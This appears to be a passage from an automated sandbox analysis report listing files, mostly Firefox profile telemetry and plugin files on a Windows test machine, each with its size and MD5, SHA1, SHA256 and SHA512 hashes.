SHA256f2f4363f5e35a19d03c81d559498b214c94526fdc6c5aa1d9ce49b97d5e83f8d
SHA512925154bff3163ba6cf4d4f44d0ad38739f0c8a6593d5655fbdcc7f7b1809499340cf098c30c696af683a7d4f22ef9b5afa1209f39c25f544288121444a08fe3d
-
Filesize
871KB
MD56ad958806d2e545420aac7cc1fcb8506
SHA16ea86c071918ab3b4db3b11201092dd2b4a9029f
SHA25690a2f86a2a1d335779fd882588ff63deaf033f08b47b1a9d0716d5e34d3a8669
SHA512c154070614882879726cb491e1decbc8e8f38d53cdc2e7424975d0b795f3af6c4c9169958136327f8f0dd7b47b3d77714d3920949334a1211299eb5fd573235d
-
Filesize
3.1MB
MD50867434e979c37b735b811da7cb62901
SHA1bc5d01c6528c3c3ee74771e26d7c042132c6fd23
SHA2567120008be37cef6748a1db1b9b4975c6944ff14c720e7d7dfabba1ad494b807b
SHA512c81bce33527a5bddb8f3739197287b07f3d6899b35c12848e47a8ccbfa886243dde93b62c1b012b2bb36ce869a6173dbcb87e7684d8dbe9f3fe1e6bdfd9b4df5
-
Filesize
3.8MB
MD530b4549afa767832cd8c3c081be8e250
SHA1ef73adb86b92133a77d15349e8726f075f2ec130
SHA2560af39c14edc100fd28dbaa0412d434ede86487e2fed5e60642a7db84c98701ad
SHA512d5e44b5fa310052a03108151d294964109403865977d561951befcdfab6a5fc31236b756f195d28e4460931c66e63b40a6e5c43b6d879ee0a554ee3c7ad6dc6d
-
Filesize
2.9MB
MD589010d351f8ec0506117c21b1bbeabd1
SHA173930a64e2998bb138a11e09ce1fa1d024ba8f19
SHA2562410bdfbeabe94203871303089e582b8d97da224004164017e950a585b5a36bc
SHA5124f7222f7dcecd8474ce8bbc3762db6da64bfed5c977403f268e04d24b6d6636f854cd19809122a851a396271084a44357141bcc560210e1930e3027cd12fe49b
-
Filesize
2.1MB
MD5664cbe9037889eee1ee4b216d6b2b39a
SHA1e252080cb9145574970ad617d75cf3d524a365b0
SHA256c7cb553bd63823408f7f8150e5ab4c7d964d638d2238828c7dc78a6debc1800c
SHA5122279f139525e947b269807bce517d9d22301e83f15719afec0219cc7e68ea1db3f9ce985e540fc06fdfe76d9b9e60dda53946f20d03b1b63ca3237d9486dfdf2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
52KB
MD56db83b23413cb8fce6755ee986ac5165
SHA1f369434dbc751120b7c88c326bcc28ec596658d8
SHA25673420ed93da2c793c2f547408fe35c01d57f85f4f900c993d0a62cd7c2ee2cf2
SHA5121353de956899b78d11c96d44f74b4177b7732085d62227fdd20282f937e37eb377f3b09f5ddd7d0a950c2f23df2c7e3023a07a45b176b0570b8fbfecba0500e4
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\AlternateServices.bin
Filesize10KB
MD5db7e8cf57dfc763d6a9ec46d33f34471
SHA1ec553a4077b2ecb5fe7f183a5562d63071afbeb5
SHA256a4525aebb8aa2e7901bc1e877903d187fe6b83eb28e099f8c41ee703575670ac
SHA5127a141427b9c97a4e65076775ae119aa0b98f2db32679d94dc0d993f281089a9c7220de96ecb79d2344ef7bd4fc39497bde2c01e44db6dde8e83667c9cf180ad4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.bin
Filesize23KB
MD596872e8e9c8473740cf4a3aee6074935
SHA1930650a52f332a9ef61b2e38ae5df384658d4ad8
SHA256300d0a7f024ee4f2838138b1f1203f07e1332e212dc0ad10a4148e62b547c920
SHA512eee1c7412f8fbfcc84322bf232e449be8bb5f815c256d46f17e5e50ffe666754fe29816ffd8d71fe9c074e9136fba3da82d937ec94088eaa4e88d05d637dfcad
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.bin
Filesize6KB
MD55091674a52ef903a6f20705c950cf2c5
SHA1ad3156410db78e242183edd518901307ef467610
SHA256f6e0e8a306605b4929e7c39bd655643412d6f6c8b3eb227375974c56204c76dc
SHA512fcbfcdeeac639dfef499a1acc1dbc7073ba4252498ab23eae7ccf96f25b4f9f3cfdaf0c2462909c485deeea8db7787480bf715a52e1b0d71cf60c9302d55486d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.bin
Filesize29KB
MD5ebb09b7e7280907ff26ac9eb88a3c23c
SHA1331b024a7393af310a464c9b47e92c7dd7d808c0
SHA256f2e35de3d41e64630400e9e49c0c6e39cd69c8bb564d56d70e918c50364ca46c
SHA512ba85962ce16fc77ec4646c76ee56b48dffad1fecd7ead95cbdafe1794a58f4b84511cfeb3e1342b290730ad5bae2ce90817eee669fb51b9b46ac422b97cf8c41
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.bin
Filesize28KB
MD5d370638b0037a420aeb7fd62a9bd1e5c
SHA14dc8bf7063f5ae93c893996411daec44dde5bd68
SHA25662be357add3577c63627002fd85488690943f2b2ecfa42b79185e94854f6bd7a
SHA5127b421b6a9c48689a677aa410f91343f7c54fbfa9a8979c367be91e20e0b49b8275830c0e45aaace9b99137f2fb4e07bc53af13b81bb309ded96f5f72326486e7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.bin
Filesize5KB
MD58cfc2b182ba01d25875a89dde6d14ed0
SHA1bb33b2b4a1cf01792e368e893320a52774df002a
SHA256f9cd6b94d7a0038198bcb73812bae87f730b9bfa17769fb3b29c87ddc4722238
SHA512e691531d3ccc13f993b35e371c8d03f967d41d899e71b7d4854740d71e1446a6840a3b10e2a2f0795094853df4e4b57e8369bce8c90b61709ae809d1a689cd10
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD5afbfa56a798056944082f562df532b8f
SHA11110c2fb8644ac2b7001b49b92832885c8c0118b
SHA2565d6eeb6351ef22044122433a115caa070bbb820cbf37d4efd13bc6b8e5e70dc1
SHA512ee2968e045296ca356a5b66635facd106c976e5aa9124c9c75805f4558a3ef0d9fe4f923a1032332adce77915ef86f04dcd75fdcf0962bdf3a9fbad7e29f4dc4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD587224b1db73322e62e949e5c5f84562a
SHA1e632a54f1086b237bf9f4de2a352637f33121d0a
SHA256296cb60554167d6720c53bd6cd32099064e7b1b223c1d1004abac45513c35031
SHA51293f60e6ec056bf03fc56b68cf91c30f525aaa3852a26bf46442088c6182e609568f4207e2713548cc5ac1d825e7cb220f29680d603b1776a7d99203eb07339f1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp
Filesize29KB
MD522cbbb1eae926f858be9d0f3de43ae6c
SHA184bb8690ff42a81c0e6c3ac0735598ab25af9067
SHA256034313379c23d1fe1199e6ec761e5382daa43aed16a9b2c7955a47ac5bb8e843
SHA512496691775a5fb165cc0114657ca7617205cbb46d818428baedf51f810abce80776a2982d3c5d096fd4f1ac711d69e9bd1c12c23c217b406b8d50d6ac1f2fdf9b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp
Filesize29KB
MD50af9d2c90d46f5cac68db08e8655a501
SHA1748e957cd69c0b8be81138f6b082472a07673832
SHA256fdbfb65da4ad3360f130e2043106b72bb29740f173b57734b18dd61e86532553
SHA51283b35f917cbeafff31f9d1871532402d45ee2f8bbcba72976dd5ab213beef0002166efce6d0f11c945c1d3c9401d54503c15627364ccba14040082346bd05f65
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD54ee06393366db2297207d0286a937d3a
SHA1044461abcef6360bd159dff093eb63664d745719
SHA2569d54fb3d07a197fd7b53dc5fcf41fc9fecefabebe48cc8eb1ea6d2b5c6551232
SHA512d6df2f731d426f994ca87ee7472eb87bba41140c34ce4de21931939a394556a1f5fb5f259ecf1182b37080c858fa2387f2410d4ec9b61ac61757c7e8ec285c50
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\0ea0e12b-c4b8-4c57-9a6a-26c6da835655
Filesize27KB
MD56a3c72a739820370fee1ef6870b26d80
SHA17951af84175cf0b4996c4b67482781545e953106
SHA256c18da5b505212f62b77b1a857641e69df84af4c6ff34344a6d2c8c067fbe1b0b
SHA5129428060d5fcee4242b8fdc7d35aa4142bfefcb049e0c2df9c2e06143a1406dd07b3ec499c14787fdd6448fd8d279baf9b3522203c07df73c6cd7142b66197c69
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\1fafb9e4-3a3c-44c9-b8d4-b7559849fd4f
Filesize982B
MD5de1d6e99c23e110658ad961e35ebd7e6
SHA1285a213e9d464cd379358dfeae8adb6bcc919c12
SHA2560554fe6d766d3f6a9e4666109e95f0271e6dbd4aa8bca67a88c7ead6fbb94c1e
SHA51248c73ca261e27fab430383742bcd95f0778beff08b89103efb612cf3345473bd2e97ddaf1f4c6b43faa4ae7c34b213ba4a1ee5d72e9750ea3f127d5e3303183c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\21ec11cc-47ce-4fa3-8239-694e70135cc9
Filesize671B
MD5e8eec4bcc64ce447a516bb03f5927953
SHA1f7328836a4a3359a8750fb40fb24c91f36f5f474
SHA256e99dfc2912785fe6faabcc9ac6123da03ee4041d00cc8f9404944547fcba69cb
SHA5129592d463acfd02e5d752e4fb16c4b7cf2de6138e3f258f4297d0424d4b45a88f9fb76b453f06e0a41818294aeef738d815a582d30cf5aa5cf7660e8402ca40d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
10KB
MD50ae8199e3d5487ba66bc90ad358c888d
SHA13b781f015aa442e62953874e097163714322cf05
SHA2568388132fc770ad5d6e75d445bf1348b55c97a31ea0467b7ef37fb151bf31f317
SHA512594418dfecfd38fdf58c5885fbc65c677ac0390e34f023e75ad380dcdfa4751395405968fdc6fa867906dfedbdbafdea3022df321f2a29c4cba0fb06263fa5d7
-
Filesize
12KB
MD5af73edbc9bdd22392626ee1b95d909af
SHA1315d1cca3ced9463fdb6e0a4bfe349a29edb4ca2
SHA256b35b3d384eb5b6220537d5cf1cc32e9154dc020e9644ca8ad6de04c4bfd069b4
SHA512c8068c3ad86e6e8c34e4df2b4914a025ccb41a0f9cfb35e8475aa9b959630eff159b1f3baf3ae2c8cd72dd219ab918bb5ab04b3784c611e5b9e9f8c92d944980
-
Filesize
15KB
MD5ac6aff2d33912712ab8a6f02c0d3510d
SHA1e7ae1af7eca5ba42891abc3f37d056f7cb8872ee
SHA256ec01914e03fe173be02410bd12bfe79b6133ac2df7c4e895758460dc6aa270d0
SHA512af8f43a5859c7a2484b2db6bb1bf82ab48e4347cbcd2d4fea1d28bc90efc2f29140a282f09bd2a6210d5a31c32461a6b894383a52a921eae18ca3cd4d64fed35
-
Filesize
10KB
MD5e86140f64aa6206f13452e3df9cadc13
SHA1adcd2979268af83ec21d8ab09e7c29ba5928ba96
SHA25699cc5b3e613592e4ebf48d29623059bd15ae692e0981f38e3a79aee801b20787
SHA5126f31bd826bd7945ef63679cef1eb4f77d8def9f5bcd4f665a773bdf14dbf08e80e81e52ce645aeae9435c1cdc170163681ef996860d4bbe87dac0dbb589795f2
-
Filesize
114KB
MD5eb8c6139f83c330881b13ec4460d5a39
SHA1837283823a7e4e107ca7e39b1e7c3801841b1ef8
SHA256489d5195735786050c4115677c5856e3ce72c3ecf2574be55021ad3d71caf40e
SHA51288411dca362f0d9da0c093e60bf2b083340d0682b5ac91f25c78ac419cec1e325d0a5a0f96fd447d3d3806813cad7f1ca8cf9c423061327fbd16c8662f3cbddf